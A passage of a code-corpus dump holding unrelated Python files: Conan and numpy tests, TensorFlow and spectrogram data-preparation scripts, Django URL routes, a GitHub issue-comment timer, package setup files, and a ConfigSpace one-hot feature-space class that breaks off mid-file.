call(u'*', u'./licenses', u'licenses', u'Pkg', True, True, [u'"a', u'b', u'c"'],
False)]
self.assertEqual(ret.copy.call_args_list, expected)
def test_package_settings(self):
# CREATE A CONANFILE TO LOAD
tmp_dir = temp_folder()
conanfile_path = os.path.join(tmp_dir, "conanfile.py")
conanfile = """from conans import ConanFile
class MyTest(ConanFile):
requires = {}
name = "MyPackage"
version = "1.0"
settings = "os"
"""
save(conanfile_path, conanfile)
# Apply windows for MyPackage
profile = Profile()
profile.package_settings = {"MyPackage": OrderedDict([("os", "Windows")])}
loader = ConanFileLoader(None, Settings({"os": ["Windows", "Linux"]}), profile)
recipe = loader.load_conan(conanfile_path, None)
self.assertEquals(recipe.settings.os, "Windows")
# Apply Linux for MyPackage
profile.package_settings = {"MyPackage": OrderedDict([("os", "Linux")])}
loader = ConanFileLoader(None, Settings({"os": ["Windows", "Linux"]}), profile)
recipe = loader.load_conan(conanfile_path, None)
self.assertEquals(recipe.settings.os, "Linux")
# If the package name is different from the conanfile one, it wont apply
profile.package_settings = {"OtherPACKAGE": OrderedDict([("os", "Linux")])}
loader = ConanFileLoader(None, Settings({"os": ["Windows", "Linux"]}), profile)
recipe = loader.load_conan(conanfile_path, None)
self.assertIsNone(recipe.settings.os.value)
|
py | b415299fe1ef1a9ef1dc5bb19e0fe728a1213df8 | n = int(input())
elements = set()
for _ in range(n):
data = input()
if " " in data:
data = data.split(" ")
for el in data:
elements.add(el)
else:
elements.add(data)
for el in elements:
print(el) |
py | b41529ac15f2d6a0f99f65fba405ca617c6cf5bb | """
SHERPA is a Python library for hyperparameter tuning of machine learning models.
Copyright (C) 2018 Lars Hertel, Peter Sadowski, and Julian Collado.
This file is part of SHERPA.
SHERPA is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
SHERPA is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with SHERPA. If not, see <http://www.gnu.org/licenses/>.
"""
from __future__ import absolute_import
from .core import *
from . import database
from .database import Client
from . import algorithms
import logging
__version__ = '1.0.6'
logging.basicConfig(level=logging.INFO)
|
py | b4152aa03df30a9c136148e0a0fcc28b3ba890f8 | import argparse
import requests
import pendulum
from github import Github
# 14 for test 12 real get up
GET_UP_ISSUE_NUMBER = 1
GET_UP_MESSAGE_TEMPLATE = (
"这次工作时间是--{get_up_time}.\r\n\r\n www \r\n\r\n 今天的总时长:\r\n {number_toady} "
)
#SENTENCE_API = "https://v1.jinrishici.com/all"
#DEFAULT_SENTENCE = "赏花归去马如飞\r\n去马如飞酒力微\r\n酒力微醒时已暮\r\n醒时已暮赏花归\r\n"
TIMEZONE = "Asia/Shanghai"
def login(token):
return Github(token)
#def get_one_sentence():
# try:
# r = requests.get(SENTENCE_API)
# if r.ok:
# return r.json().get("content", DEFAULT_SENTENCE)
# return DEFAULT_SENTENCE
#except:
# print("get SENTENCE_API wrong")
# return DEFAULT_SENTENCE
def get_today_get_up_status(issue):
comments = list(issue.get_comments())
if not comments:
return False
latest_comment = comments[-1]
number_today = 0
now = pendulum.now(TIMEZONE)
latest_day = pendulum.instance(latest_comment.created_at).in_timezone(
"Asia/Shanghai"
)
while((latest_day.day == now.day) and (latest_day.month == now.month)):
if number_today >= len(comments)-2:
break
number_today = number_today +1
latest_comment = comments[-number_today]
latest_day = pendulum.instance(latest_comment.created_at).in_timezone(
"Asia/Shanghai"
)
return number_today
def make_get_up_message(number_toady):
#sentence = get_one_sentence()
now = pendulum.now(TIMEZONE)
# 3 - 7 means early for me
# is_get_up_early = 6 <= now.hour <= 18
get_up_time = now.to_datetime_string()
number_toady_str = str((number_toady+1) * 25) + 'min'
body = GET_UP_MESSAGE_TEMPLATE.format(get_up_time=get_up_time, number_toady=number_toady_str) #, sentence=sentence)
return body #, is_get_up_early
def main(github_token, repo_name):
u = login(github_token)
repo = u.get_repo(repo_name)
issue = repo.get_issue(GET_UP_ISSUE_NUMBER)
number_toady = get_today_get_up_status(issue)
# if is_toady:
# print("Today I have recorded the wake up time")
# return
early_message = make_get_up_message(number_toady)
body = early_message
#if weather_message:
# weather_message = f"现在的天气是{weather_message}\n"
# body = weather_message + early_message
#if is_get_up_early:
issue.create_comment(body)
# send to telegram
# if tele_token and tele_chat_id:
# requests.post(
# url="https://api.telegram.org/bot{0}/{1}".format(
# tele_token, "sendMessage"
# ),
# data={
# "chat_id": tele_chat_id,
# "text": body,
# },
# )
#else:
# print("You wake up late")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("github_token", help="github_token")
parser.add_argument("repo_name", help="repo_name")
# parser.add_argument(
# "--weather_message", help="weather_message", nargs="?", default="", const=""
# )
# parser.add_argument("--tele_token", help="tele_token", nargs="?", default="", const="")
#parser.add_argument("--tele_chat_id", help="tele_chat_id", nargs="?", default="", const="")
options = parser.parse_args()
main(
options.github_token,
options.repo_name,
# options.weather_message,
# options.tele_token,
# options.tele_chat_id,
)
|
py | b4152bbcc10e5ae286bd12431bd1d4218f763f11 | import pytest
from .models import User
@pytest.mark.django_db
def test_user_create():
User.objects.create_user('john', '[email protected]', 'johnpassword')
assert User.objects.count() == 1
|
py | b4152bde3b88f895c4aa910f602af278de09246f | import tensorflow as tf
import os
import numpy as np
import augmentations
import histogram
import data_processing
AUTOTUNE = tf.data.experimental.AUTOTUNE
IMG_HEIGHT = 320
IMG_WIDTH = 640
TRAIN = 'train'
TEST = 'test'
VALID = 'valid'
fax = os.name != 'nt'
# STEPS_PER_EPOCH = np.ceil(image_count/BATCH_SIZE)
def regression_dataset(data_dir, type=TRAIN, bs=2, cache=True, gt_from_txt=False, uv=True):
pth = '/images/*'
list_ds = tf.data.Dataset.list_files(str(data_dir + pth))
labeled_ds = list_ds.map(lambda x: process_path_regression(x, gt_from_txt, type, uv), num_parallel_calls=AUTOTUNE)
train_ds = data_processing.prepare_for_training(labeled_ds, bs=bs, type=type, cache=cache)
return train_ds
def dataset(data_dir, type=TRAIN, bs=2, corrected=True, cache=True):
pth = '/img_corrected_1/*' if corrected else '/images/*'
list_ds = tf.data.Dataset.list_files(str(data_dir + pth))
labeled_ds = list_ds.map(lambda x: process_path(x, type), num_parallel_calls=AUTOTUNE)
train_ds = prepare_for_training(labeled_ds, bs=bs, type=type, cache=cache)
return train_ds
def normalize(*images):
if len(images) == 1:
return histogram.to_uv(images[0])
images = list(map(histogram.to_uv, images))
return images
def get_mask(file_path, gt_from_txt=False, segmentation=True):
parts = tf.strings.split(file_path, os.path.sep)
# The second to last is the class-directory
pth = 'gt_mask' if segmentation else 'gt'
pth = pth if not gt_from_txt else 'ill'
ext = tf.convert_to_tensor(['txt' if gt_from_txt else 'png'])
name = tf.strings.split(parts[-1], '.')[0]
name = tf.strings.reduce_join([tf.convert_to_tensor([name]), ext], separator='.')
path = tf.concat([parts[:-2], tf.convert_to_tensor([pth, name])], axis=0)
path = tf.strings.reduce_join(path, separator="/")
if gt_from_txt:
file = tf.io.read_file(path)
mask = tf.io.decode_csv(file, [1., 1., 1., 1., 1., 1.], field_delim=' ')
return tf.convert_to_tensor(mask)
mask = tf.io.read_file(path)
mask = decode_img(mask)
if fax:
mask = 1 - mask
# if segmentation:
# mask = tf.reduce_max(mask, axis=2, keepdims=True)
return mask
def decode_img(img):
# convert the compressed string to a 3D uint8 tensor
img = tf.image.decode_png(img, channels=3)
# Use `convert_image_dtype` to convert to floats in the [0,1] range.
img = tf.image.convert_image_dtype(img, tf.float32)
# resize the image to the desired size.
return img
def process_path_regression(file_path, gt_from_txt, type, uv):
mask = get_mask(file_path, segmentation=False)
# load the raw data from the file as a string
img = tf.io.read_file(file_path)
img = decode_img(img)
if type == TRAIN:
img, mask = load_image_train({'image': img, 'segmentation_mask': mask})
if not gt_from_txt:
img, mask = augmentations.color(img, mask)
else:
img, mask = load_image_test({'image': img, 'segmentation_mask': mask})
img_vis = img
if uv:
img, Iy = histogram.to_uv(img)
img = tf.stack([Iy, img[...,0], img[...,1]], axis=-1)
if gt_from_txt:
mask = get_mask(file_path, gt_from_txt, segmentation=False)
if uv:
mask = tf.reshape(mask, (-1, 3))
mask, masky = histogram.to_uv(mask)
mask = tf.reshape(mask, (-1,))
else:
mask = tf.reduce_mean(mask, axis=(0, 1))
if uv:
mask, masky = histogram.to_uv(mask)
return img, mask, img_vis
def process_path(file_path, type=TRAIN):
mask = get_mask(file_path)
# load the raw data from the file as a string
img = tf.io.read_file(file_path)
img = decode_img(img)
if type == TRAIN:
img, mask = load_image_train({'image': img, 'segmentation_mask': mask})
img, mask = augmentations.augment(img, mask)
else:
img, mask = load_image_test({'image': img, 'segmentation_mask': mask})
img = tf.image.resize(img, [IMG_HEIGHT, IMG_WIDTH])
mask = tf.image.resize(mask, [IMG_HEIGHT, IMG_WIDTH])
img_uv, Iy = histogram.to_uv(img)
mask = tf.round(mask)
mask = tf.where(mask == tf.convert_to_tensor([1., 1., 1.]), tf.convert_to_tensor([1., 0., 0.]),
tf.convert_to_tensor([0., 0., 1.]))
mask = tf.where(tf.expand_dims(Iy, axis=2) < 0.09, tf.convert_to_tensor([0., 1., 0.]), mask)# BLACK CLASS
return img_uv, mask, img
@tf.function
def load_image_train(datapoint):
input_image = tf.image.resize(datapoint['image'], (IMG_HEIGHT, IMG_WIDTH))
input_mask = tf.image.resize(datapoint['segmentation_mask'], (IMG_HEIGHT, IMG_WIDTH))
if tf.random.uniform(()) > 0.5:
input_image = tf.image.flip_left_right(input_image)
input_mask = tf.image.flip_left_right(input_mask)
if tf.random.uniform(()) > 0.5:
input_image = tf.image.flip_up_down(input_image)
input_mask = tf.image.flip_up_down(input_mask)
return input_image, input_mask
def load_image_test(datapoint):
input_image = tf.image.resize(datapoint['image'], (IMG_HEIGHT, IMG_WIDTH))
input_mask = tf.image.resize(datapoint['segmentation_mask'], (IMG_HEIGHT, IMG_WIDTH))
# input_image, input_mask = normalize(input_image, input_mask)
return input_image, input_mask
|
py | b4152c47362aecb093346ae0456d3132cfd881e6 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 9 16:40:48 2019
@author: TH
"""
# =============================================================================
# Padding and resizing
# =============================================================================
import numpy as np
import pandas as pd
import os
import matplotlib.pyplot as plt
import PIL.Image as pimg
from pathlib import Path
import torch
print (os.listdir("../input"))
#%%
! tar xf ../input/spectrograms.tar.bz2 # Zip all the spectrum graphs
#%%
data_dir = Path('../input')
label_dir = data_dir/'NIPS4B_BIRD_CHALLENGE_TRAIN_LABELS'
spect_dir = Path('./spectrograms')
resized_dir = Path('./spectrograms_resized')
resized_dir.mkdir(parents = True, exist_ok = True)
#%%
for ds in ('train', 'test'): # return the histogram of spectrum sizes
sizes = torch.Tensor([pimg.open(p).size for p in (spect_dir/ds).glob('*.png')])
print(ds, "[max_width, min_width, height]:")
print(list(map(lambda t:t.item(), (torch.max(sizes[:, 0]),
torch.min(sizes[:, 0]),
sizes[0, 1]))))
plt.hist(sizes[:, 0])
plt.title(f'Widths in {ds} dataset')
plt.show()
#%%
def pad_repeat(image:pimg.Image, width:int): # Resize the spectrums
if (image.width >= width): # Not changed image
return image
new_im = pimg.new('RGB', (width, image.height))
# offset = (width - image.width) // 2 % image.width
offset = 0
# first part of the spectrum
box = (image.width, 0, image.width, image.height)
new_im.paste(image.crop(box))
while offset < width: # Resizing it to the wanted size
new_im.paste(image, (offset, 0))
offset += image.width
return new_im
#%%
#offset = (676 - 136) // 2 % 136
#
#offset = 0
#print ("start_p",offset)
#box_ = (0, 0, 136, 193)
#new_im_ = pimg.new('RGB', (676, 193))
#new_im_.paste(to_pad.crop(box_))
#display(new_im_)
#while offset < 676:
# new_im_.paste(to_pad, (offset, 0))
# display(new_im_)
# offset += 136
# print (offset)
# print (new_im_.size)
#display(new_im_)
#%%
to_pad = pimg.open(str(spect_dir/'train'/'nips4b_birds_trainfile115.png'))
print(to_pad.size)
display(to_pad)
padded = pad_repeat(to_pad, 676)
display(padded)
print(padded.size)
#%%
def pad_resize_folder(from_path, to_path, folder=""): # Create resized graphs
(to_path/folder).mkdir(parents=True, exist_ok=True)
fns = list((from_path/folder).glob('*.png'))
mw = max(map(lambda p: pimg.open(p).width, fns))
for src in fns:
dest = to_path/folder/src.name
pad_repeat(pimg.open(src), mw).resize((mw, mw)).save(dest)
for ds in ('train', 'test'):
pad_resize_folder(spect_dir, resized_dir, ds)
#%%
import random
for ds in ('train', 'test'):
fig, axs = plt.subplots(3,3,figsize=(12,12))
fig.suptitle(ds)
fns = list((resized_dir/ds).glob('*.png'))
for fn, ax in zip(random.choices(fns, k=9),
axs.flatten()):
ax.imshow(plt.imread(str(fn)))
ax.set_title(fn.stem)
ax.axis('off')
#%%
for ds in ('train', 'test'): # return the histogram of spectrum sizes
sizes = torch.Tensor([pimg.open(p).size for p in (resized_dir/ds).glob('*.png')])
print(ds, "[max_width, min_width, height]:")
print(list(map(lambda t:t.item(), (torch.max(sizes[:, 0]),
torch.min(sizes[:, 0]),
sizes[0, 1]))))
plt.hist(sizes[:, 0])
plt.title(f'Widths in {ds} dataset')
plt.show()
#%%
! tar cjf spectrograms_resized.tar.bz2 $resized_dir # Create a zipped file
! rm -r $spect_dir $resized_dir |
py | b4152ce79e685abe7c171a22d78a21332fcd6f47 | # -*- encoding: utf-8 -*-
"""
License: MIT
Copyright (c) 2019 - present AppSeed.us
"""
from django.urls import path, re_path
from app import views
from django.conf.urls import url
urlpatterns = [
# Matches any html file
re_path(r'^.*\.html', views.pages, name='pages'),
# The home page
path('', views.index, name='home'),
path('api', views.api, name='api'),
path('complain.html', views.forms, name='forms'),
re_path(r'^delete/', views.delete, name='delete'),
]
|
py | b4152d6a9be3367987b4b8eb0a780ccabef56c31 | n = int(input())
s = input()
prev_x = ''
prev_y = ''
k = 1
for c in s:
if c in ['R', 'L']:
if c == 'R' and prev_x == 'L' or c == 'L' and prev_x == 'R':
k += 1
prev_x = c
prev_y = ''
else:
prev_x = c
if c in ['U', 'D']:
if c == 'U' and prev_y == 'D' or c == 'D' and prev_y == 'U':
k += 1
prev_x = ''
prev_y = c
else:
prev_y = c
print(k)
|
py | b4152deb0cd001843c7fe4677a7cfececc1ccdf7 | """
A dataset handle and abstract low level access to the data. the dataset will
takes data stored locally, in the format in which they have been downloaded,
and will convert them into a MNE raw object. There are options to pool all the
different recording sessions per subject or to evaluate them separately.
"""
from .alex_mi import AlexMI
from .bbci_eeg_fnirs import Shin2017A, Shin2017B
from .bnci import (
BNCI2014001,
BNCI2014002,
BNCI2014004,
BNCI2014008,
BNCI2014009,
BNCI2015001,
BNCI2015003,
BNCI2015004,
)
from .braininvaders import bi2013a
from .epfl import EPFLP300
# flake8: noqa
from .gigadb import Cho2017
from .mpi_mi import MunichMI
from .physionet_mi import PhysionetMI
from .schirrmeister2017 import Schirrmeister2017
from .ssvep_exo import SSVEPExo
from .ssvep_mamem import MAMEM1, MAMEM2, MAMEM3
from .ssvep_nakanishi import Nakanishi2015
from .ssvep_wang import Wang2016
from .upper_limb import Ofner2017
from .Weibo2014 import Weibo2014
from .Zhou2016 import Zhou2016
|
py | b4152e3261e8870ec139215bb890a2e50418da47 | """Model to represent DeviantArt Eclipse Deviation Awarded Badges."""
from daeclipse.models.model import Model
class DeviationAwardedBadge(Model):
"""Model to represent DeviantArt Eclipse Deviation Awarded Badges."""
def __init__(self, attrs=None):
"""Initialize DeviationAwardedBadge.
Args:
attrs (dict, optional): Dict of model attributes.
"""
self.id = None
self.type_id = None
self.name = None
self.title = None
self.base_title = None
self.description = None
self.stack_count = None
self.images = None
super().__init__(attrs)
def from_dict(self, attrs):
"""Convert attrs values to class attributes.
Args:
attrs (dict): Dict containing DeviationAwardedBadge fields.
"""
super().from_dict(attrs)
self.id = attrs.get('id')
self.type_id = attrs.get('typeId')
self.name = attrs.get('name')
self.title = attrs.get('title')
self.base_title = attrs.get('baseTitle')
self.description = attrs.get('description')
self.stack_count = attrs.get('stackCount')
self.images = attrs.get('images')
|
py | b4152f189286fb26e6c78959c808768c5bb32be6 |
# Dicts to interpret result of play
cPLAY_RESULT_INVLD = {0: 'Strike/Foul'}
cPLAY_RESULT_OUT = {
1: 'Strikeout',
4: 'Out',
5: 'Caught',
6: 'Caught',
0xE: 'SacFly'
}
cPLAY_RESULT_SAFE = {
2: 'BB',
3: 'HBP',
7: 'Single',
8: 'Double',
9: 'Triple',
0xA: 'Homerun',
0x10: 'ClearedBases'
}
cPLAY_RESULT_BUNT = {0xD: 'Bunt'}
# Consts used to create profile query
cCharacters = 1
cCaptains = 2
cTYPE_OF_SWING = {
0: "None",
1: "Slap",
2: "Charge",
3: "Star",
4: "Bunt"
} |
py | b4152fafa4a95c5f05e2149e51744e3aa99e4c14 | from __future__ import division, absolute_import, print_function
from numpy.testing import *
import numpy as np
from numpy import (array, ones, r_, mgrid, unravel_index, zeros, where,
ndenumerate, fill_diagonal, diag_indices,
diag_indices_from, s_, index_exp, ndindex)
class TestRavelUnravelIndex(TestCase):
def test_basic(self):
assert_equal(np.unravel_index(2, (2, 2)), (1, 0))
assert_equal(np.ravel_multi_index((1, 0), (2, 2)), 2)
assert_equal(np.unravel_index(254, (17, 94)), (2, 66))
assert_equal(np.ravel_multi_index((2, 66), (17, 94)), 254)
assert_raises(ValueError, np.unravel_index, -1, (2, 2))
assert_raises(TypeError, np.unravel_index, 0.5, (2, 2))
assert_raises(ValueError, np.unravel_index, 4, (2, 2))
assert_raises(ValueError, np.ravel_multi_index, (-3, 1), (2, 2))
assert_raises(ValueError, np.ravel_multi_index, (2, 1), (2, 2))
assert_raises(ValueError, np.ravel_multi_index, (0, -3), (2, 2))
assert_raises(ValueError, np.ravel_multi_index, (0, 2), (2, 2))
assert_raises(TypeError, np.ravel_multi_index, (0.1, 0.), (2, 2))
assert_equal(np.unravel_index((2*3 + 1)*6 + 4, (4, 3, 6)), [2, 1, 4])
assert_equal(
np.ravel_multi_index([2, 1, 4], (4, 3, 6)), (2*3 + 1)*6 + 4)
arr = np.array([[3, 6, 6], [4, 5, 1]])
assert_equal(np.ravel_multi_index(arr, (7, 6)), [22, 41, 37])
assert_equal(
np.ravel_multi_index(arr, (7, 6), order='F'), [31, 41, 13])
assert_equal(
np.ravel_multi_index(arr, (4, 6), mode='clip'), [22, 23, 19])
assert_equal(np.ravel_multi_index(arr, (4, 4), mode=('clip', 'wrap')),
[12, 13, 13])
assert_equal(np.ravel_multi_index((3, 1, 4, 1), (6, 7, 8, 9)), 1621)
assert_equal(np.unravel_index(np.array([22, 41, 37]), (7, 6)),
[[3, 6, 6], [4, 5, 1]])
assert_equal(
np.unravel_index(np.array([31, 41, 13]), (7, 6), order='F'),
[[3, 6, 6], [4, 5, 1]])
assert_equal(np.unravel_index(1621, (6, 7, 8, 9)), [3, 1, 4, 1])
def test_dtypes(self):
# Test with different data types
for dtype in [np.int16, np.uint16, np.int32,
np.uint32, np.int64, np.uint64]:
coords = np.array(
[[1, 0, 1, 2, 3, 4], [1, 6, 1, 3, 2, 0]], dtype=dtype)
shape = (5, 8)
uncoords = 8*coords[0]+coords[1]
assert_equal(np.ravel_multi_index(coords, shape), uncoords)
assert_equal(coords, np.unravel_index(uncoords, shape))
uncoords = coords[0]+5*coords[1]
assert_equal(
np.ravel_multi_index(coords, shape, order='F'), uncoords)
assert_equal(coords, np.unravel_index(uncoords, shape, order='F'))
coords = np.array(
[[1, 0, 1, 2, 3, 4], [1, 6, 1, 3, 2, 0], [1, 3, 1, 0, 9, 5]],
dtype=dtype)
shape = (5, 8, 10)
uncoords = 10*(8*coords[0]+coords[1])+coords[2]
assert_equal(np.ravel_multi_index(coords, shape), uncoords)
assert_equal(coords, np.unravel_index(uncoords, shape))
uncoords = coords[0]+5*(coords[1]+8*coords[2])
assert_equal(
np.ravel_multi_index(coords, shape, order='F'), uncoords)
assert_equal(coords, np.unravel_index(uncoords, shape, order='F'))
def test_clipmodes(self):
# Test clipmodes
assert_equal(
np.ravel_multi_index([5, 1, -1, 2], (4, 3, 7, 12), mode='wrap'),
np.ravel_multi_index([1, 1, 6, 2], (4, 3, 7, 12)))
assert_equal(np.ravel_multi_index([5, 1, -1, 2], (4, 3, 7, 12),
mode=(
'wrap', 'raise', 'clip', 'raise')),
np.ravel_multi_index([1, 1, 0, 2], (4, 3, 7, 12)))
assert_raises(
ValueError, np.ravel_multi_index, [5, 1, -1, 2], (4, 3, 7, 12))
class TestGrid(TestCase):
def test_basic(self):
a = mgrid[-1:1:10j]
b = mgrid[-1:1:0.1]
assert_(a.shape == (10,))
assert_(b.shape == (20,))
assert_(a[0] == -1)
assert_almost_equal(a[-1], 1)
assert_(b[0] == -1)
assert_almost_equal(b[1]-b[0], 0.1, 11)
assert_almost_equal(b[-1], b[0]+19*0.1, 11)
assert_almost_equal(a[1]-a[0], 2.0/9.0, 11)
def test_linspace_equivalence(self):
y, st = np.linspace(2, 10, retstep=1)
assert_almost_equal(st, 8/49.0)
assert_array_almost_equal(y, mgrid[2:10:50j], 13)
def test_nd(self):
c = mgrid[-1:1:10j, -2:2:10j]
d = mgrid[-1:1:0.1, -2:2:0.2]
assert_(c.shape == (2, 10, 10))
assert_(d.shape == (2, 20, 20))
assert_array_equal(c[0][0, :], -ones(10, 'd'))
assert_array_equal(c[1][:, 0], -2*ones(10, 'd'))
assert_array_almost_equal(c[0][-1, :], ones(10, 'd'), 11)
assert_array_almost_equal(c[1][:, -1], 2*ones(10, 'd'), 11)
assert_array_almost_equal(d[0, 1, :]-d[0, 0, :], 0.1*ones(20, 'd'), 11)
assert_array_almost_equal(d[1, :, 1]-d[1, :, 0], 0.2*ones(20, 'd'), 11)
class TestConcatenator(TestCase):
def test_1d(self):
assert_array_equal(r_[1, 2, 3, 4, 5, 6], array([1, 2, 3, 4, 5, 6]))
b = ones(5)
c = r_[b, 0, 0, b]
assert_array_equal(c, [1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1])
def test_mixed_type(self):
g = r_[10.1, 1:10]
assert_(g.dtype == 'f8')
def test_more_mixed_type(self):
g = r_[-10.1, array([1]), array([2, 3, 4]), 10.0]
assert_(g.dtype == 'f8')
def test_2d(self):
b = rand(5, 5)
c = rand(5, 5)
d = r_['1', b, c] # append columns
assert_(d.shape == (5, 10))
assert_array_equal(d[:, :5], b)
assert_array_equal(d[:, 5:], c)
d = r_[b, c]
assert_(d.shape == (10, 5))
assert_array_equal(d[:5, :], b)
assert_array_equal(d[5:, :], c)
class TestNdenumerate(TestCase):
def test_basic(self):
a = array([[1, 2], [3, 4]])
assert_equal(list(ndenumerate(a)),
[((0, 0), 1), ((0, 1), 2), ((1, 0), 3), ((1, 1), 4)])
class TestIndexExpression(TestCase):
def test_regression_1(self):
# ticket #1196
a = np.arange(2)
assert_equal(a[:-1], a[s_[:-1]])
assert_equal(a[:-1], a[index_exp[:-1]])
def test_simple_1(self):
a = np.random.rand(4, 5, 6)
assert_equal(a[:, :3, [1, 2]], a[index_exp[:, :3, [1, 2]]])
assert_equal(a[:, :3, [1, 2]], a[s_[:, :3, [1, 2]]])
def test_c_():
a = np.c_[np.array([[1, 2, 3]]), 0, 0, np.array([[4, 5, 6]])]
assert_equal(a, [[1, 2, 3, 0, 0, 4, 5, 6]])
def test_fill_diagonal():
a = zeros((3, 3), int)
fill_diagonal(a, 5)
yield (assert_array_equal, a,
array([[5, 0, 0],
[0, 5, 0],
[0, 0, 5]]))
#Test tall matrix
a = zeros((10, 3), int)
fill_diagonal(a, 5)
yield (assert_array_equal, a,
array([[5, 0, 0],
[0, 5, 0],
[0, 0, 5],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0]]))
#Test tall matrix wrap
a = zeros((10, 3), int)
fill_diagonal(a, 5, True)
yield (assert_array_equal, a,
array([[5, 0, 0],
[0, 5, 0],
[0, 0, 5],
[0, 0, 0],
[5, 0, 0],
[0, 5, 0],
[0, 0, 5],
[0, 0, 0],
[5, 0, 0],
[0, 5, 0]]))
#Test wide matrix
a = zeros((3, 10), int)
fill_diagonal(a, 5)
yield (assert_array_equal, a,
array([[5, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 5, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 5, 0, 0, 0, 0, 0, 0, 0]]))
# The same function can operate on a 4-d array:
a = zeros((3, 3, 3, 3), int)
fill_diagonal(a, 4)
i = array([0, 1, 2])
yield (assert_equal, where(a != 0), (i, i, i, i))
def test_diag_indices():
di = diag_indices(4)
a = array([[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12],
[13, 14, 15, 16]])
a[di] = 100
yield (assert_array_equal, a,
array([[100, 2, 3, 4],
[5, 100, 7, 8],
[9, 10, 100, 12],
[13, 14, 15, 100]]))
# Now, we create indices to manipulate a 3-d array:
d3 = diag_indices(2, 3)
# And use it to set the diagonal of a zeros array to 1:
a = zeros((2, 2, 2), int)
a[d3] = 1
yield (assert_array_equal, a,
array([[[1, 0],
[0, 0]],
[[0, 0],
[0, 1]]]))
def test_diag_indices_from():
x = np.random.random((4, 4))
r, c = diag_indices_from(x)
assert_array_equal(r, np.arange(4))
assert_array_equal(c, np.arange(4))
def test_ndindex():
x = list(np.ndindex(1, 2, 3))
expected = [ix for ix, e in np.ndenumerate(np.zeros((1, 2, 3)))]
assert_array_equal(x, expected)
x = list(np.ndindex((1, 2, 3)))
assert_array_equal(x, expected)
# Test use of scalars and tuples
x = list(np.ndindex((3,)))
assert_array_equal(x, list(np.ndindex(3)))
# Make sure size argument is optional
x = list(np.ndindex())
assert_equal(x, [()])
x = list(np.ndindex(()))
assert_equal(x, [()])
if __name__ == "__main__":
run_module_suite()
|
py | b415300d1c4658433782d6d233bb6c4e66b9bdc2 | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
from codecs import open
import sys
if sys.version_info[:3] < (3, 0, 0):
print("Requires Python 3 to run.")
sys.exit(1)
with open("README.md", encoding="utf-8") as file:
readme = file.read()
setup(
name="rebound-cli",
version="2.1.0",
description="Command-line tool that automatically fetches Stack Overflow results after compiler errors",
#long_description=readme,
#long_description_content_type="text/markdown",
url="https://github.com/shobrook/rebound",
author="shobrook",
author_email="[email protected]",
classifiers=[
"Environment :: Console",
"Intended Audience :: Developers",
"Topic :: Software Development",
"Topic :: Software Development :: Debuggers",
"Natural Language :: English",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python"
],
keywords="stackoverflow stack overflow debug debugging error-handling compile errors error message cli search commandline",
include_package_data=True,
packages=["rebound"],
entry_points={"console_scripts": ["rebound = rebound.rebound:main"]},
install_requires=["BeautifulSoup4", "requests", "urllib3", "urwid"],
requires=["BeautifulSoup4", "requests", "urllib3", "urwid"],
python_requires=">=3",
license="MIT"
)
|
py | b41533d110fca69265b0503dd5f35ea69edf268c | import warnings
import ConfigSpace as CS
import numpy as np
from scipy import stats
from xbbo.configspace.abstract_feature_space import (
AbstractFeatureSpace,
Identity,
Ord2Uniform,
Cat2Onehot,
U2gaussian,
Category,
Ordinal,
U2Onehot
)
class FeatureSpace_discrete_all_oneHot(AbstractFeatureSpace):
'''
sparse array <=> feature space
all variable i.i.d ~ U(0, 1)
'''
def __init__(self, discrete_degree):
super().__init__()
# self.dtypes_idx_map = dtypes_idx_map
# self.discrete_degree = discrete_degree
self.discrete_degree = discrete_degree
self.unif = U2Onehot()
self.cat = Cat2Onehot()
self.ord = Cat2Onehot()
self.features_ = []
self.src_ids = []
self.trg_ids = []
self.dtypes_idx_map = {
'cat': Array_idx_map(),
'int': Array_idx_map(),
'float': Array_idx_map(),
'ord': Array_idx_map(),
}
nums, ords, cats, size_sparse, size_dense, categories = self._get_mappings()
if nums:
self.dtypes_idx_map['float'].src_ids, self.dtypes_idx_map['float'].trg_ids, self.dtypes_idx_map[
'float'].cat_sizes = \
map(np.uintp, zip(*nums))
self.dtypes_idx_map['float'].cats = nums
if ords:
self.dtypes_idx_map['ord'].src_ids, self.dtypes_idx_map['ord'].trg_ids, self.dtypes_idx_map[
'ord'].cat_sizes = \
map(np.uintp, zip(*ords))
self.dtypes_idx_map['ord'].cats = ords
if cats:
self.dtypes_idx_map['cat'].src_ids, self.dtypes_idx_map['cat'].trg_ids, self.dtypes_idx_map[
'cat'].cat_sizes = \
map(np.uintp, zip(*cats))
self.dtypes_idx_map['cat'].cats = cats
# self.nums = nums
# self.cats = cats
self.categories = np.asarray(categories)
self.sparse_dimension = size_sparse
self.dense_dimension = size_dense
def _get_mappings(self):
nums = []
# nums_float = []
# nums_ord = []
cats = []
ords = []
categories = []
src_ind = trg_ind = 0
for src_ind, hp in enumerate(self.space.get_hyperparameters()):
if isinstance(hp, CS.CategoricalHyperparameter):
cat_size = hp.num_choices
cats.append((src_ind, trg_ind, cat_size))
trg_ind += cat_size
categories.append(len(hp.choices))
elif isinstance(hp, (CS.UniformIntegerHyperparameter,CS.UniformFloatHyperparameter)):
nums.append((src_ind, trg_ind, self.discrete_degree))
categories.append(self.discrete_degree)
trg_ind += self.discrete_degree
elif isinstance(hp, CS.OrdinalHyperparameter):
categories.append(len(hp.sequence))
cat_size = hp.num_elements
ords.append((src_ind, trg_ind, cat_size))
trg_ind += cat_size
# elif isinstance(hp, (CS.UniformIntegerHyperparameter,
# CS.UniformFloatHyperparameter,
# CS.OrdinalHyperparameter)):
# nums.append((src_ind, trg_ind))
else:
raise NotImplementedError(
"Only hyperparameters of types "
"`CategoricalHyperparameter`, "
"`UniformIntegerHyperparameter`, "
"`OrdinalHyperparameter`, "
